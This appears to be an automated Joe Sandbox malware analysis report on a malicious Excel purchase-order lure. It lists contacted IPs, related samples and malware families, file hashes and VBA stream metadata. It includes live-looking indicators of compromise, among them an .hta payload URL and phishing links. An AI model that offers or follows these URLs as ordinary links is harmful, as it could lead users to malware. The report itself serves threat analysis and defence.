                            8987AMAZONEXPANSIONGBfalse
                            104.168.7.38
                            unknownUnited States
                            36352AS-COLOCROSSINGUSfalse
                            5.161.200.29
                            st3.proGermany
                            24940HETZNER-ASDEfalse
                            13.107.246.60
                            s-part-0032.t-0009.t-msedge.netUnited States
                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1636404
                            Start date and time:2025-03-12 18:33:36 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:ORDEM DE COMPRA.xla.xlsx
                            Detection:MAL
                            Classification:mal56.winXLSX@4/4@3/4
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .xlsx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Active ActiveX Object
                            • Active ActiveX Object
                            • Scroll down
                            • Close Viewer
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.28.47, 23.199.214.10, 199.232.214.172, 52.182.143.208, 20.189.173.7, 20.189.173.1, 52.123.129.14, 40.126.31.3, 4.175.87.197
                            • Excluded domains from analysis (whitelisted): onedscolprdwus00.westus.cloudapp.azure.com, slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, onedscolprdcus04.centralus.cloudapp.azure.com, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, onedscolprdwus06.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, config.officeapps.l
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            13:35:39API Interceptor928x Sleep call for process: splwow64.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3.39.89.152Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                              SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                      Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                        Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                          Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                            Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                              Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                104.168.7.38Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 104.168.7.38/xampp/kscc/scc/everynicepersonwalkingentireplacesgoodformegreat.hta
                                                5.161.200.29SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                  Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                          Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                  Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                    13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                                                                    • www.mimecast.com/Customers/Support/Contact-support/
                                                                    http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                                                    • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    s-0005.dual-s-msedge.netNeue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 52.123.129.14
                                                                    SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 52.123.129.14
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 52.123.128.14
                                                                    Offer to Purchase.xlsGet hashmaliciousUnknownBrowse
                                                                    • 52.123.129.14
                                                                    NFO 12032025.msgGet hashmaliciousUnknownBrowse
                                                                    • 52.123.128.14
                                                                    a00f6c96-d9f8-afb1-6add-aa2447c17df9.emlGet hashmaliciousUnknownBrowse
                                                                    • 52.123.129.14
                                                                    4be792f3-60eb-40d6-9a49-38b2d5c6224e.emlGet hashmaliciousUnknownBrowse
                                                                    • 52.123.128.14
                                                                    Fw_ VN MSG 4_42_16 AM DURATION_0f0b5f5e889448e7c935c0db95b1d2a6.msgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                    • 52.123.129.14
                                                                    Rappel vous n'avez pas encore sign#U00e9 mon invitation.msgGet hashmaliciousUnknownBrowse
                                                                    • 52.123.128.14
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 52.123.128.14
                                                                    bg.microsoft.map.fastly.netNeue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    B32leNmDKJ.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    internalinfrastructuremainoffice-7.0.2317-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 199.232.214.172
                                                                    svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                    • 199.232.210.172
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    TOUR_PACKAGE.vbeGet hashmaliciousAgentTeslaBrowse
                                                                    • 199.232.210.172
                                                                    Gogles-suter-x64.exeGet hashmaliciousMicroClipBrowse
                                                                    • 199.232.210.172
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    st3.proSWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    HETZNER-ASDESWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    9ua5N7dcBZ.exeGet hashmaliciousAmadey, RHADAMANTHYSBrowse
                                                                    • 213.239.239.164
                                                                    https://atechelectricalengr.com/mpd/?rim=tlczs5qdc&xyr=touz&t=nbvaz8e57bgik9d&kti=jj4jd3jmzzna7&mso=559hb800tw4jljj6zf&chh2pve49=u8Y0610YGet hashmaliciousCaptcha PhishBrowse
                                                                    • 188.40.246.96
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                    • 88.198.246.242
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                    • 88.198.246.242
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                    • 88.198.246.242
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                    • 88.198.246.242
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                    • 88.198.246.242
                                                                    https://go.51.caGet hashmaliciousUnknownBrowse
                                                                    • 195.201.57.90
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                    • 88.198.246.242
                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSNeue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.67
                                                                    Offer to Purchase.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    9ua5N7dcBZ.exeGet hashmaliciousAmadey, RHADAMANTHYSBrowse
                                                                    • 104.40.149.189
                                                                    Speccy64.exeGet hashmaliciousUnknownBrowse
                                                                    • 13.90.213.204
                                                                    Speccy64.exeGet hashmaliciousUnknownBrowse
                                                                    • 13.90.213.204
                                                                    pid.kvai.exeGet hashmaliciousUnknownBrowse
                                                                    • 204.79.197.203
                                                                    https://simplified.com/designs/cd97e327-288b-43f7-99e7-024626ab4a8c/share?utm_content=cd97e327-288b-43f7-99e7-024626ab4a8c&utm_campaign=share&utm_medium=link&utm_source=projectlinksGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                    • 150.171.27.10
                                                                    Cherokee Brick_Vnote_GUHFIOE.svgGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                    • 13.107.6.156
                                                                    AMAZONEXPANSIONGBNeue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 3.39.89.152
                                                                    SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 3.39.89.152
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 3.39.89.152
                                                                    Offer to Purchase.xlsGet hashmaliciousUnknownBrowse
                                                                    • 3.39.153.44
                                                                    NW67yMXbfP.exeGet hashmaliciousPonyBrowse
                                                                    • 3.33.130.190
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 3.39.153.44
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 3.39.89.152
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 3.39.89.152
                                                                    Purchase order003.exeGet hashmaliciousFormBookBrowse
                                                                    • 3.33.130.190
                                                                    https://we.tl/t-BnGuynUcjLGet hashmaliciousUnknownBrowse
                                                                    • 52.223.40.198
                                                                    AS-COLOCROSSINGUSNeue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 23.95.235.28
                                                                    SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 23.95.235.45
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 104.168.7.38
                                                                    Offer to Purchase.xlsGet hashmaliciousUnknownBrowse
                                                                    • 192.227.228.22
                                                                    dU0tqAiUyN.exeGet hashmaliciousRemcosBrowse
                                                                    • 198.23.227.212
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 172.245.191.88
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 172.245.191.88
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 172.245.191.88
                                                                    onceufeelgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                    • 172.245.191.88
                                                                    SAINV101.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                    • 192.227.246.70
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    6271f898ce5be7dd52b0fc260d0662b3Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    Offer to Purchase.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    https://crypt.single-sign-on.password.land/Xd3QvSWJuTlhiVW04UGxPbkxoejhHVU80SU05YXVvd2Q1ZnhDMFVkN2RYQnRPM00wZ1ZhT0xuR3l5d2NvbW9vME00MURTS1lmdEwwSmdwcEtLaTJSZFpkbDd3dnJGVmdCcUNzMngxN2NOOTd0ZHhHZTJaQzN2K1ZtZ0NBanJFQXFYQk5MU2ZBT2VteUtFTkVubWtHYkVLNkNncmJpUnBOL3RLWXp2N25BTUltZ0RGcUViZnExV3pYY3BlN2kwOGhHd2hrYnR0MmVPME1pMlpCWG9PQ0JVd1RvMWd2Mi0tK2NtTUtPVmpHMWdhOENYQi0tNFkxM1RaaTIxS0pqSVk4MHhlWGFUZz09?cid=2442051797Get hashmaliciousKnowBe4Browse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    http://def.ball-strike-up.shop/Get hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 5.161.200.29
                                                                    • 3.39.89.152
                                                                    a0e9f5d64349fb13191bc781f81f42e1Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    Offer to Purchase.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    Q6EK7dte4N.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 13.107.246.60
                                                                    x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 13.107.246.60
                                                                    M1gP5m86Gn.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 13.107.246.60
                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.60
                                                                    ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 13.107.246.60
                                                                    DEVM24-clean.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 13.107.246.60
                                                                    No context
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):118
                                                                    Entropy (8bit):3.5700810731231707
                                                                    Encrypted:false
                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):784
                                                                    Entropy (8bit):2.7137690747287806
                                                                    Encrypted:false
                                                                    SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                                                    MD5:09F73B3902CD3D88E04312787956B654
                                                                    SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                                                    SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                                                    SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.7769794087092887
                                                                    Encrypted:false
                                                                    SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                    MD5:37BD8218D560948827D3B948CAFA579C
                                                                    SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                    SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                    SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                    Malicious:true
                                                                    Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Mar 11 12:01:01 2025, Security: 1
                                                                    Entropy (8bit):7.983018375656202
                                                                    TrID:
                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                    File name:ORDEM DE COMPRA.xla.xlsx
                                                                    File size:1'308'160 bytes
                                                                    MD5:2cffe74ee266afc00cdad106cc7064a1
                                                                    SHA1:5a9ad43a3a53c9ee102bbe33b21bb2c8bf3ecc76
                                                                    SHA256:0d234506eca49eb07fd6caeab63c31718877d8766b657a7a1daa4ea103be954b
                                                                    SHA512:ae57fb6e8acd71e195e5b3c3876582c2c411616355791415e13ef0f9438298f1042611de49ff093cf69c0c6426ef3cee2817f84b9505ed03a35a96012e522334
                                                                    SSDEEP:24576:+JJN6EM2sTVgyawU1CGO7oaomhapQs7ANo+9npaJ0/6CYnKxuds:cJNA5xaP/O7oarhMB7Yz9paJ0/As
                                                                    TLSH:E0552328BBC45B0BC0DF99B94C86C6B284758DCABE26D1573398339D7836679938731C
                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                    Icon Hash:35e58a8c0c8a85b9
                                                                    Document Type:OLE
                                                                    Number of OLE Files:1
                                                                    Has Summary Info:
                                                                    Application Name:Microsoft Excel
                                                                    Encrypted Document:True
                                                                    Contains Word Document Stream:False
                                                                    Contains Workbook/Book Stream:True
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:False
                                                                    Flash Objects Count:0
                                                                    Contains VBA Macros:True
                                                                    Code Page:1252
                                                                    Author:
                                                                    Last Saved By:
                                                                    Create Time:2006-09-16T00:00:00Z
                                                                    Last Saved Time:2025-03-11T11:59:57Z
                                                                    Creating Application:Microsoft Excel
                                                                    Security:0
                                                                    Document Code Page:1252
                                                                    Thumbnail Scaling Desired:false
                                                                    Contains Dirty Links:false
                                                                    Shared Document:false
                                                                    Changed Hyperlinks:false
                                                                    Application Version:12.0000
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                    VBA File Name:Sheet1.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8a af de dd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet1"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                    VBA File Name:Sheet2.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8a af 92 24 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet2"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                    VBA File Name:Sheet3.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
